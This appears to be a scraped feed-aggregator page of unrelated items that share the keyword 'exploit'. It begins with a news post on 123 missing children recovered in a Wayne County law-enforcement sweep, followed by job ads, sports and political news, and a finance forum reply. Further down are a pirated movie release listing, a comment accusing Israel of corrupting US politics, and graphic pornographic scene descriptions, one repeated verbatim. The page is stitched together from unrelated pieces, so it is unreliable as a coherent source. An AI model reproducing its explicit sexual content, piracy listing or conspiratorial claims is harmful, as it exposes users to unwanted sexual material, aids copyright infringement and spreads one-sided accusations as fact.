    (Email Him At WestMIPolitics@Gmail.com)

    123 missing kids have been rescued in Wayne County after a historic law enforcement sweep involving raids from multiple agencies at the federal, state, and local level.

    Many of the victims are believed to have been used as sex slaves in human trafficking operations.

    More details are expected in the weeks and months ahead... 

    According to the Detroit Free Press:

    "A one-day sweep by multiple law enforcement agencies in Wayne County resulted in the recovery of 123 missing children, according to the U.S. Marshals Service.

    The sweep, dubbed Operation MISafeKid and conducted on Sept. 26, involved the Detroit Missing Child Recovery Unit of the U.S. Marshals Sex Offender Investigations Branch coordinated with the National Center for Missing and Exploited Children, the U.S. Department of Housing and Urban Development — Office of Inspector General, Michigan State Police and law enforcement officers from other Wayne County agencies.

    The effort in particular was aimed at locating victims of sex trafficking.

    During the one-day operation, out of 301 case files, 123 children were identified and recovered safely. "Three cases were identified as being possible sex trafficking cases, and one homeless teen was transported back to the command post after it was discovered that he had not had anything to eat in three days. He was then debriefed and turned over to Child Protective Services for aftercare," the U.S. Marshals Service said in a news release." 
    _________________________________________________________________

    Brandon Hall is a lifelong political nerd from Grand Haven, and is the Managing Editor of West Michigan Politics.

    >>>Email him at WestMIPolitics@Gmail.com
    Facebook
    Twitter

              EPL: Hazard will leave Chelsea for Real Madrid on one condition – Mark Hughes      Cache   Translate Page      
    Southampton boss, Mark Hughes has revealed that Chelsea ace, Eden Hazard will leave Stamford Bridge for Real Madrid on one condition. Hazard has been heavily linked with a move to join the La Liga giants following his exploits at the 2018 FIFA World Cup in Russia. Hughes, a former Chelsea striker, said that Hazard will […]
              Comment on Ocasio-Cortez and other new Dems ‘need to be educated’ on Israel, says Rep. Eliot Engel by US Citizen      Cache   Translate Page      
    Of course there is another country that has interfered in U.S. elections, has endangered Americans living or working overseas and has corrupted America’s legislative and executive branches. It has exploited that corruption to initiate legislation favorable to itself, has promoted unnecessary and unwinnable wars and has stolen American technology and military secrets. Its ready access to the mainstream media to spread its own propaganda provides it with cover for its actions and it accomplishes all that and more through the agency of a powerful and well-funded domestic lobby that oddly is not subject to the accountability afforded by the Foreign Agents Registration Act (FARA) of 1938 even though it manifestly works on behalf of a foreign government. That country is, of course, Israel. http://mondoweiss.net/2016/08/about-russian-influence https://consortiumnews.com/2017/04/20/why-not-a-probe-of-israel-gate us_politics_than_russia_20170427 http://www.awdnews.com/political/assange-forget-russia-,-the-real-threat-to-america-comes-from-israel-and-the-israel-lobby https://www.counterpunch.org/2018/09/03/the-truths-that-wont-be-told-how-israel-spies-on-us-citizens/
              Machiniste - Groupe SFP ressources humaines - Fermont, QC      Cache   Translate Page      
    *ArcelorMittal Exploitation minière Canada s.e.n.c.* est le numéro un mondial de l’exploitation sidérurgique et minière et compte plus de 220 000 employés... $39.76 - $45.10 an hour
    From Indeed - Wed, 01 Aug 2018 19:33:47 GMT - View all Fermont, QC jobs
              The Equalizer 2 2018 NEW HDTS x264 AC3-MP4KiNG      Cache   Translate Page      

    The Equalizer 2 2018 NEW HDTS x264 AC3-MP4KiNG
    The Equalizer 2 2018 NEW HDTS x264 AC3-MP4KiNG
    Language: English
    956.87 MB | 01:55:02 | 1032 Kbps | AVC | 720x344 | AC3, 48 Khz, 2 channels, 128 Kbps
    Genre: Action | Crime | Thriller
    iMDB info

    Provider: Lori.Yagami


    Robert McCall serves an unflinching justice for the exploited and oppressed, but how far will he go when that is someone he loves?


              directeur/directrice de l'exploitation - services administratifs - Boys and Girls Club of Yukon - Whitehorse, YT      Cache   Translate Page      
    Langues Anglais Études Baccalauréat Expérience 5 ans ou plus Compétences particulières Embaucher, former ou déléguer la formation du personnel; Faire... $37,000 - $42,250 a year
    From Guichet emplois - Wed, 19 Sep 2018 04:47:53 GMT - View all Whitehorse, YT jobs
              Re: Helping girlfriend (full-time teacher) with retirement options: 401k, 403b, 457?      Cache   Translate Page      
    MortgageOnBlack wrote:
    Mon Feb 12, 2018 11:04 am

    My current impression is that the 403b should be completely avoided unless she is able to max out the 401k/457 and IRA. I felt very suspicious of her 403b when I realized a salesguy was involved.


    Your instinct about the exploitative 403b/457b sales reps is 100% accurate, actually you may even be underestimating it, but by avoiding the 403b you'd also be avoiding the best (least expensive) option.



    I'm enrolled in Security Benefit's NEA DirectInvest 403b and I have a fully diversified portfolio of Vanguard index funds that cost roughly 0.063% per year plus a $35 yearly fee that is waived when I hit 50k. I documented the plan here. I documented the process we went through to enroll here.



    If Krow's information on the PERA Plus plan is accurate, and I have every reason to believe it is, then it is clearly more expensive. I suppose that expense could be justified to purchase a target date fund as opposed to the 3 fund portfolio available in the NEA DirectInvest plan.



    I agree with the notion that an IRA is preferable to every option if the investor can't exceed $5,500/year in contributions.



    On a side note, AXA is absolutely terrible. I documented their plan here. Run.
              Une demande indemnitaire fondée sur l’illégalité d’une décision de la Cnac est insusceptible d’appel      Cache   Translate Page      
    Selon la cour administrative de Marseille, les cours administratives d’appel statuent en premier et dernier ressort sur les actions indemnitaires fondées sur l’illégalité des décisions d’exploitation commerciale prises par la Cnac.
              Police Raid Thai Playboy Caveman’s Home After Going Viral for Seducing Western Women      Cache   Translate Page      

    A popular “caveman” in Thailand became the subject of an investigation by local police after his exploits with numerous Western female tourists went viral on social media. Before gaining internet notoriety, 48-year-old Chatupoom Losiri was a minor online personality who is known for living in a cave on the Full Moon Party island of Koh...

    The post Police Raid Thai Playboy Caveman’s Home After Going Viral for Seducing Western Women appeared first on NextShark.


              Watch Taron Egerton and Jamie Foxx in new Robin Hood trailer      Cache   Translate Page      
    Robin (Egerton) a war-hardened Crusader and his Moorish commander (Foxx) mount an audacious revolt against the corrupt English crown in a thrilling action-adventure packed with gritty battlefield exploits, mind-blowing fight choreography, and a timeless romance.​
              Comment on Iowa Rally Chants “Lock Her Up” After Trump Taunts Diane Feinstein by Jean Lafitte (@loupgarous)      Cache   Translate Page      
    Once again, the President's his own worst enemy at these rallies and on Twitter by dropping to the level of his detractors. I understand <i>why</i> he does it - it's got to be frustrating to have your enemies exploit a captive electronic media and film celebrities against you. But it's a losing game. You can't out-fart a skunk.
              Directeur(rice) en magasin H/F      Cache   Translate Page      
    Nous recherchons un(e) directeur(rice) de magasin pour une intégration sur notre magasin de Marseille avec une mobilité Grand Sud Est. Si vous vous reconnaissez dans ce portrait ... Vous êtes prêt à prendre en charge la responsabilité d'un de nos magasins. Vous animez votre équipe de direction composée de chefs de secteur et les coachez avec ambition, reconnaissance et exigence. Passionné par l'univers de la maison (que vous soyez fin gourmet ou gourmand, créatif ou astucieux, tout est possible....), vous définissez et mettez en oeuvre votre stratégie commerciale et participez à l'évolution de notre stratégie produit (vous êtes prêt à prendre des risques et ne craignez pas l'échec !). Vous inculquez une forte culture de résultats et pilotez votre compte d'exploitation en étroite collaboration avec votre comité de direction (sens et pédagogie sont vos maitres mots !). Commerçant dans l'âme, vous incarnez l'écoute client et savez impliquer votre équipe pour lui donner tout son sens en magasin. Audacieux, vous contribuez activement à l'innovation dans le commerce de la maison créative dans un esprit " comme à la maison " et fédérez votre équipe dans ce projet d'entreprise
              Windows 10 Home, Microsoft augmente sa tarification de 40%      Cache   Translate Page      

    Aussi étrange que cela puisse paraitre, Microsoft a rectifié le prix de la licence de Windows 10 Home. Ce système d’exploitation est désormais proposé à 139 dollars sur sa boutique en ligne. Microsoft a pris la décision d’augmenter de manière  importante la tarification de son système d’exploitation Windows 10 Home. De manière discrète son prix ...

    The post Windows 10 Home, Microsoft augmente sa tarification de 40% appeared first on GinjFo.


              442265-2018: Italie-Cavenago di Brianza: Exploitation d'une décharge      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: | Document: Avis d'attribution de marché
              441159-2018: Danemark-Vordingborg: Équipement minier, équipement pour l'exploitation de carrières, matériel de construction      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: | Document: Avis d'attribution de marché
              Anomali Publishes Cybersecurity Report on DAX-100 Germany Companies      Cache   Translate Page      
    New Report from Anomali Labs Analyses State of Cybersecurity Across Largest German Enterprises NUREMBERG, Germany, Oct. 10, 2018 (GLOBE NEWSWIRE) — Anomali today announced at the IT-SA Security Expo and Congress the release of the 2018 DAX 100 cybersecurity profile report. This report represents the third consecutive year in which Anomali Labs has analyzed the state of cybersecurity for the DAX 100 companies, and details ongoing suspected cyber threat activity across German enterprises. The report, available for download, provides insights into five critical threat categories that could provide attackers with an exploitable opportunity to compromise DAX 100 enterprises and its […]
              Adjointe – Exploitation, énergie éolienne et solaire | #ADM172 - innergex - Windthorst, SK      Cache   Translate Page      
    JOB POSTING #ADM172 POSITION: ASSISTANT – OPERATIONS, WIND AND SOLAR ENERGY WINDTHORST, TEXAS (USA) COMPANY PROFILE Innergex Renewable Energy Inc. is a...
    From innergex - Thu, 04 Oct 2018 18:55:39 GMT - View all Windthorst, SK jobs
              BCEJP00017403 - Analyste principal sécurité - Modis Canada - Montréal, QC      Cache   Translate Page      
    Analyste principal sécurité Assure la planification, la conception, la construction et l'exploitation des réseaux de la compagnie de plusieurs milliards de...
    From Modis Canada - Fri, 05 Oct 2018 21:37:09 GMT - View all Montréal, QC jobs
              Сексуальная девушка колледжа жаждет о сексе втроем. / Lyra Threeway - Exploited College Girls (2018) HD 720p      Cache   Translate Page      
    Сексуальная девушка колледжа жаждет о сексе втроем. / Lyra Threeway - Exploited College Girls (2018) HD 720p

    Описание: When we last saw Lyra, we were impressed with her great attitude, sexiness and her delicious D cup tits. Now she’s back to take on two cocks at once and again she doesn’t disappoint! While she comes across as the slightly nerdy girl next door type, we know her better as the freaky Dead Head who loves getting fucked hard in all her holes. In fact, she refers to herself as a hippie whore and we couldn’t agree more! No matter what we threw at her, she came back asking for more with a sloppy smile that told us all we needed to know about her. She was excited for weeks leading up to her threesome debut and couldn’t wait to be filled up by our studs engorged cocks filling all her up until she was squealing with pleasure.

               The Eden Hazard plan: Real Madrid ready to make move for Chelsea star       Cache   Translate Page      
    Dubbed 'The Hazard Plan', Real Madrid hope to exploit the Belgian's contract situation in order to get him relatively cheaply - as they did with goalkeeper Thibaut Courtois.
              FMOS-FAPH/USTTB : Ginna Dogon honore la mémoire de Pr. Ogobara Doumbo (Autre presse)      Cache   Translate Page      
    Dans la matinée du vendredi 28 septembre 2018, un vibrant hommage a été rendu à feu professeur Ogobara Doumbo pour ses nombreux exploits en faveur du Mali, de l’Afrique et du monde entier. C’était à l’initiative de l’association Ginna Dogon en partenariat avec la Faculté de médecine et d’odontostomatologie (FMOS) et la Faculté de pharmacie (FAPH) de l’Université des sciences, des techniques et des technologies de Bamako (USTTB). Mme le ministre de l’Innovation et de la Recherche scientifique, [...]
              Deja Vu: The Gas Conflict Around Cyprus Is Getting Worse      Cache   Translate Page      

    Via GEFIRA,

    In early October, the Cypriot government invited tenders for gas extraction in Block 7. Ankara believes that this step impairs the interests of both Turkey and the Turkish Cypriots and announced that remedial measures will be taken, which might entail an escalation of tensions in this region of the Mediterranean.

    Turkey neither recognizes Cyprus’s maritime borders nor the agreements its exclusive economic zones. Nicosia manages the gas exploration in the waters it considers its own. This leads to a conflict about which the Gefira Team is reporting on a regular basis. In February we described the complex situation in connection with the gas blocks around Cyprus.

    Then the Turkish navy stopped the exploration ship of Italian Eni from entering Cyprus’ territorial waters by threatening to sink it. In response, Rome sent its own ships to the region.

    So far, the dispute concerned the southern and eastern basin around Cyprus. Last week Nicosia invited tenders for gas exploration in Block 7, which could be another casus belli, because Blocks 1, 4, 5, 6 and 7 are crossed by the Turkish-Egyptian border, recognized by Turkey. Cyprus, however, in 2003 concluded an agreement with Egypt regarding the Exclusive Economic Zone (EEZ), which Ankara does not honour.

    The Turkish government is of the opinion that both the Turkish authorities and North Nicosia (the capital of Northern Cyprus) have the right to decide on the exploitation of these sectors.

    Turkey’s Ministry of Foreign Affairs issued a statement, in which it says that:

    1. mining in Block 7 cannot take place without Turkey’s consent due to the sea border passing there;

    2. Cypriot Turks are co-owners of the island and hence of its natural resources at the bottom of territorial waters;

    3. unilateral invitation of tenders by Nicosia violates the interests of Northern Cyprus and Turkey;

    4. Ankara will take steps to protect its rights and those of Turkish Cypriots, including the blocking of the third party’s exploration

    We expect that if the Turkish Navy again blocks the exploration vessel of the Italian Eni, or the French TOTAL, or the American Exxon-Mobil (these companies were invited to take part in the tender), the reaction of the governments of the respective countries will be stronger than it was in February.


              10/10/2018: CANADA: Notley, Kenney clash over Odin photos      Cache   Translate Page      

    EDMONTON • Alberta Premier Rachel Notley says Opposition Leader Jason Kenney must stop “dog-whistle” politics that allow hateful extremists to believe they have a home in his United Conservative Party. But Kenney is accusing Notley of exploiting a...
              Prat-Bonrepaux. Noémie et Djem du Castéras champions de France      Cache   Translate Page      
    La Grande Semaine de Pompadour vient de sacrer un jeune poney né, élevé et valorisé en Occitanie, en Ariège, et plus précisément au pied du château de Prat-Bonrepaux. Lors de cette manifestation qui rassemble chaque année le grand public et les passionnés d'équitation (troisième fédération sportive et premier sport féminin en nombre de licenciés), «Djem du Castéras» et Noémie Bosc ont réitéré leur exploit de l'an passé, s'adjugeant une...
              RESPONSABLE DE SITE TRANSPORT ET LOGISTIQUE H/F      Cache   Translate Page      
    Vous assurez le management, la coordination et le contrôle de l'organisation des activités du site, dans le cadre d'un budget validé par la Direction. Vous garantissez la bonne marche de l'exploitation en termes de qualité, sécurité, maîtrise des coûts et de productivité des équipes. Vous assurez la gestion et l'animation du personnel (10 personnes) et des sous-traitants transport. Vos principales missions : - gérer les flux entrants et sortants dans le respect des process : réception, tri automatisé, préparation, mise à quai, livraison (avec une forte saisonnalité) - atteindre les objectifs de qualité de service, de satisfaction client, de productivité, et de sécurité - animer, coordonner, suivre et contrôler l'activité des sous-traitants transport, chargés de la distribution - gérer les aspects RH du site : recrutement, administration du personnel, gestion des intérimaires... - analyser et contrôler la qualité de service opérationnelle, mettre en place des actions d'amélioration - suivre le budget annuel et effectuer un reporting régulier - garantir la bonne application de la législation sociale, ainsi que de la politique sécurité et sûreté
              Responsable d'Agence H/F - 59      Cache   Translate Page      
    Directement rattaché au Directeur Régional de la filiale, vous serez garant du bon fonctionnement de votre agence.Véritablement à la tête de votre propre centre de profit, vous managerez de manière autonome les moyens humains et matériels et développerez l'activité commerciale. Afin d'y parvenir, vos missions en tant que Responsable d'Agence se déploieront de la manière suivante : - Mise en place et pilotage de la stratégie commerciale du groupe pour réaliser les objectifs commerciaux - Prospection et développement de la clientèle sur votre zone. - Management et coaching d'une équipe d'une douzaine de collaborateurs - Supervision de la formation - Identification et mise place des objectifs - Définition des budgets d'investissement et de fonctionnement - Mise en place d'actions permettant d'atteindre un résultat d'exploitation conforme aux objectifs préalablement fixés.
              Responsable d'Agence H/F - 94      Cache   Translate Page      
    Directement rattaché au Directeur Régional de la filiale, vous serez garant du bon fonctionnement de votre agence.Véritablement à la tête de votre propre centre de profit, vous managerez de manière autonome les moyens humains et matériels et développerez l'activité commerciale.Afin d'y parvenir, vos missions en tant que Responsable d'Agence se déploieront de la manière suivante : - Mise en place et pilotage de la stratégie commerciale du groupe pour réaliser les objectifs commerciaux - Prospection et développement de la clientèle sur votre zone. - Management et coaching d'une équipe de 10 collaborateurs - Supervision de la formation - Identification et mise place des objectifs - Définition des budgets d'investissement et de fonctionnement - Mise en place d'actions permettant d'atteindre un résultat d'exploitation conforme aux objectifs préalablement fixés.
              Analyste Concepteur Interfaces Comptables H/F      Cache   Translate Page      
    Au sein de la DSIU Groupe "Business Technology", domaine applicatif Finance, comptabilité et progiciels financiers, vous interviendrez de façon opérationnelle sur l'ensemble des traitements d'Interfaces comptables (incluant l'interpréteur comptable AI Suite édité par AXWAY) pour en assurer le suivi et la maintenance évolution et ce, dans le cadre du système qualité de la DSI (ISO 9001). Les interfaces comptables permettent de transformer les événements de gestion des différentes applications du système d'information Coface (Facturation, contentieux, réassurance, trésorerie, paie, etc.) en écritures comptables pour intégration dans les modules de comptabilités auxiliaires (clients et fournisseurs) et de comptabilité générale du système comptable (ERP) Coface pour son compte et plusieurs entités du groupe. Pour certains flux, la production des écritures comptables s'accompagne de la génération des pièces comptables associées transmises aux tiers. L'ensemble de ces traitements sont des traitements batchs. Sous la coordination du responsable de l'activité Interfaces comptables, vous aurez en charge les actions de suivi d'exploitation, maintenance évolution allant de la phase de conception jusqu'à la mise en production et vous interviendrez directement sur la phase de recueil de besoins, spécifications fonctionnelles et techniques, réalisation (programmation et paramétrage), intégration, qualification, support à la recette et mise en production. Dans le cadre de la mise en oeuvre de nouvelles versions, vous participerez à l'organisation des opérations avec les différentes parties prenantes, vous effectuerez les tests de premier niveau et assisterez les directions utilisatrices dans les phases de recette. Vous serez en relation permanente avec les maîtrises d'ouvrages, les équipes DSI tant Etudes que Production.
              441931-2018: Pologne-Olsztyn: Services d'exploitation forestière      Cache   Translate Page      
    Date de publication: 10/10/2018 | Date limite: 26-10-2018 | Document: Informations complémentaires
              TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)      Cache   Translate Page      
    TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

    When horny, perverted casting director Dee Williams calls in the next actress auditioning for her next big blockbuster, shes absolutely giddy to see the gorgeously fuck-able Chanel Santini come sauntering in the door. Exploiting her position of power, Dee demands that Chanel strip down to her lingerie to prove she €really wants the part.€ Swooping in to make a move on the stunning actress, Dee grabs at Chanels tits, rubbing herself and licking her lips as Miss Santini tries to read her lines. As Dee pushes Chanels boundaries further and further - kissing and licking at her pert nipples - Santini whips her hand up to Dees throat, giving this Hollywood exec what she deserves! €Youre going to ruin my career, arent you?!,€ Dee moans. With another deep kiss, Chanel whispers, €Absolutely€¦.€ Using Dees flexible, taut, and hungry body for her pleasure, Chanel fucks Dirty Director Williams in every position the casting couch allows! Forward, backward, and sideways, Chanel shoves her long, thick cock into Dees wet, desiring pussy and mouth while Dee cums over and over again, finally squirting all over Miss Santinis hard dick before its shoved back inside her hole for another round. Before flipping Miss Williams over to explore her tight pink asshole, Chanel is serviced by Dees feet - her toes spreading and clenching as they slide up and down Chanels glistening cock. Thoroughly turned on, Chanel wants to make full use of this perverted whore, shoving her dick deep into Dee as she moans in pleasure. Doggy, missionary, cowgirl - this pair does it all with an undeniable chemistry until Dees tight asshole gapes from Chanels use and Chanel squirts her load high on to Dees dripping cunt. With lots of deep kissing, squirting, tons of cock sucking, foot worship, and intense anal, this casting couch isnt one to miss! Will Chanel take Hollywood down?! Not before she makes Hollywood go down on her!

              TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)      Cache   Translate Page      
    TSPussyHunters.com/Kink.com - Chanel Santini, Dee Williams - Going Down On Hollywood!: Young Starlet Fucks Perverted Casting Director (540p/SD)#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

    When horny, perverted casting director Dee Williams calls in the next actress auditioning for her next big blockbuster, shes absolutely giddy to see the gorgeously fuck-able Chanel Santini come sauntering in the door. Exploiting her position of power, Dee demands that Chanel strip down to her lingerie to prove she €really wants the part.€ Swooping in to make a move on the stunning actress, Dee grabs at Chanels tits, rubbing herself and licking her lips as Miss Santini tries to read her lines. As Dee pushes Chanels boundaries further and further - kissing and licking at her pert nipples - Santini whips her hand up to Dees throat, giving this Hollywood exec what she deserves! €Youre going to ruin my career, arent you?!,€ Dee moans. With another deep kiss, Chanel whispers, €Absolutely€¦.€ Using Dees flexible, taut, and hungry body for her pleasure, Chanel fucks Dirty Director Williams in every position the casting couch allows! Forward, backward, and sideways, Chanel shoves her long, thick cock into Dees wet, desiring pussy and mouth while Dee cums over and over again, finally squirting all over Miss Santinis hard dick before its shoved back inside her hole for another round. Before flipping Miss Williams over to explore her tight pink asshole, Chanel is serviced by Dees feet - her toes spreading and clenching as they slide up and down Chanels glistening cock. Thoroughly turned on, Chanel wants to make full use of this perverted whore, shoving her dick deep into Dee as she moans in pleasure. Doggy, missionary, cowgirl - this pair does it all with an undeniable chemistry until Dees tight asshole gapes from Chanels use and Chanel squirts her load high on to Dees dripping cunt. With lots of deep kissing, squirting, tons of cock sucking, foot worship, and intense anal, this casting couch isnt one to miss! Will Chanel take Hollywood down?! Not before she makes Hollywood go down on her!

              Calls for legal migrant prostitution after research finds some exploited | Stuff.co.nz      Cache   Translate Page      


              Stagiaire en Informatique – technologies d'exploitation minière - Rio Tinto - Havre-Saint-Pierre, QC      Cache   Translate Page      
    On les trouve partout, des téléphones intelligents aux avions et aux voitures, en passant par les hôpitaux et les maisons....
    From Rio Tinto - Sat, 22 Sep 2018 11:00:13 GMT - View all Havre-Saint-Pierre, QC jobs
              Smartphone Crosscall Trekker-X4 Double SIM 64 Go Noir      Cache   Translate Page      

    699€

    Smartphone Crosscall Trekker-X4 Double SIM 64 Go Noir


    Smartphone 4G, Fonction GPS, A-GPS, Glonass, Baidou et Galileo support, Système d’exploitation : Android 8.1.0 Oreo, Caméra frontale : 8 MP, Bluetooth 5.0 LE, WiFi IEEE 802.11 b/g/n/ac, WIFI Direct, HotSpot, NFC, Radio FM, Double Nano SIM

    TREKKER-X4
    CREATE YOUR LIFE STORY

    1 VIVEZ INTENSÉMENT

    2 CAPTUREZ CRÉATIVEMENT

    3 ÉDITEZFACILEMENT

    4 PARTAGEZ INSTANTANÉMENT

    CAPTUREZ ET PARTAGEZ VOS EXPÉRIENCES OUTDOOR ; DE LA MÊME FAÇON QUE VOUS LES VIVEZ, DE LA MÊME FAÇON QUE VOUS LES RESSENTEZ !

    Simple d’utilisation, fluide et intuitif, le TREKKER-X4 est probablement le 1er téléphone au monde a avoir été conçu autour de la vidéo tout en optimisant les promesses clés de la marque: il est le plus résistant de la gamme, le plus étanche et le plus adapté au monde de l’outdoor. Mais la véritable prouesse du TREKKER-X4 est sans doute de réunir le meilleur des action-cams dans un design optimisé de seulement 12,8 mm d’épaisseur. Profitez d’une expérience vidéo sans pareille, partagez la et faites revivre l’intensité de vos sorties à vos proches.

    PANOMORPH TECHNOLOGY

    POUR CORRIGER LES DISTORSIONS

    Plusieurs angles de vue : 88°, 110°, 140°, 170° | Stabilisation | Hyperstabilisation : fixation horizontale de la prise de vue qui compense les mouvements du téléphone.

    X-CAM

    UNE EXPÉRIENCE VIDÉO TOUT-EN-UN

    Applinative (conçue et développée par Crosscall) dédiée à la prise de vidéo, édition et montage.
    Pour une prise en main intuitive et immédiate.

    OUTDOOR

    AUCUN COMPROMIS SUR L'ADN CROSSCALL

    Résistance prouvée en milieu outdoor | Drop Test 2 mètres | Norme militaire 12 tests (MIL-STD-810G) | IP68 (2 mètres 1 h) | Flash 2x0,5W | Gorilla Glass 5

    X-LINK

    FIXATION / CHARGE ET TRANSFERT DE DONNÉES

    Système intelligent de connexion magnétique itélligent pour associer le TREKKER-X4 à une large gamme d’accessoires.| Fixation renforcée par le X-BLOCKER, une pièce unique de sécurisation.

    PHOTOS 12MP

    UNE QUALITÉ PHOTO OPTIMISÉE

    2 capteurs indépendants 88°/170° pour couvrir tous les usages | Autofocus hybride: PDAF (optimal en haute luminosité) + laser (optimal en basse luminosité)

    TECHNOLOGIE PANOMORPHE

    Une technologie innovante et disruptive

    La technologie Panomorphe consiste à projeter la réalité sur une demi sphère puis utiliser des traitement logiciels afin de reconstruire l’image (grâce au dewarping), en gardant l’angle de vue tout en corrigeant les distorsions. Elle offre des images grand angle, stabilisées, au plus proche de la perception de l’oeil, même avec très peu de recul.
    Avec la technologie panomorphe, donnez une nouvelle perspective à vos prises de vue !

    X-CAM : EXPÉRIENCE VIDÉO TOUT-EN-UN

    VIVEZ PLUS INTENSÉMENT...

    CAR IL EST IDÉAL POUR TOUTES LES ACTIVITÉS OUTDOOR …

    ÉTANCHE

    IP68, 2m 60min, étanche à l'eau salée | Membrane Gore-tex pour l’étanchéification des hauts parleurs et micros

    RÉSISTANT

    Drop test 2 m sur béton (6 faces) | Verre avant ET arrière Gorilla glass 5, 0,9mm d’épaisseur avant – 0,7mm arrière | Monté sur silent blocks | Side bars en aluminium | Double injection TPU, absorbeur de chocs | MIL STD 810.G sur 12 tests

    LONGUE AUTONOMIE

    Batterie 4400 mAh | Mode économie d’énergie outdoor pour une expérience vidéo longue et sans encombre. | Chargement rapide QC 3.0 | Câble USB-C blindé à charge rapide

    … ET QUE SON CONNECTEUR MAGNÉTIQUE X-LINK PERMET DE L’ASSOCIER À UN GRAND NOMBRE D’ACCESSOIRES, POUR PROFITER DES FONCTIONS VIDÉO DU TÉLÉPHONE DANS TOUTES VOS SORTIES.

    … Fixation en un geste | transfert de données* | Charge*

    Que vous soyez en ski, en parapente ou en jet ski… embarquez le TREKKER-X4 partout avec vous grâce à sa gamme complète d’accessoires, puis chargez et transférez vos souvenirs de façon simple et instinctive. Soyez sûr de pouvoir revivre en vidéo chacun de vos plus beaux moments !

    CAPTUREZ CRÉATIVEMENT

    INNOVATION CROSSCALL

    HYPERSTAB UNE IMAGE IMPERTURBABLE

    En plus du mode stabilisé, la fonction Hyperstab® permet de réaliser des vidéos qui gardent leur horizontalité. L’analyse des données du gyroscope compense les mouvements et vibrations de la captation vidéo et supprime ainsi les mouvements superflus du smartphone. C’est le seul téléphone à filmer en 16:9 quelle que soit l’orientation du smartphone . Les vidéos sont ainsi stabilisées même dans les usages les plus extrêmes (trail, vtt, ski..)

    DASHCAM : ENREGISTREZ VOS ACTIONS PASSÉES!

    Avec cette option, votre smartphone filme en continue. Dès que vous le souhaitez, mettez en mémoire les quelques dernières minutes filmées !

    LES AUTRES MODES PRÉCONFIGURÉS DE LA X-CAM!

    DYNAMIC: pour enregistrer toutes les activités outdoor en vidéo grand angle stabilisé

    SLOW MOTION: permet de ralentir l’image jusqu’à 5 fois.

    TIME-LAPSE: pour monter une vidéo à partir de photos prises à intervalle de temps réguliern

    LIVE STREAMING: pour partager en « LIVE » sur les réseaux sociaux toutes les vidéos grand angle du TREKKER-X4

    ÉDITEZ FACILEMENT

    Créez vos montages vidéos (X-STORY) en un clin d’oeil. Libre à vous d’ajouter des effets, transitions, filtres et de la musique de manière ultra simple et intuitive pour donner de la vie à vos aventures.

    PARTAGEZ INSTANTANÉMENT

    Aussitôt votre X-STORY créée, partagez la à vos amis et sur les réseaux sociaux.
    Le TREKKER-X4 vous donne également la possibilité de partager en direct vos

    ET AUSSI...

    PHOTO 12MP

    Partenariats avec des experts du traitement d’image (Qualcomm®, Immervision®, MM-Solution®, DxO®) | Double caméra (170° / 88°) | Autofocus hybride (PDAF + laser)

    SON

    Son stéréo avec deux haut-parleurs dédiés d'une puiss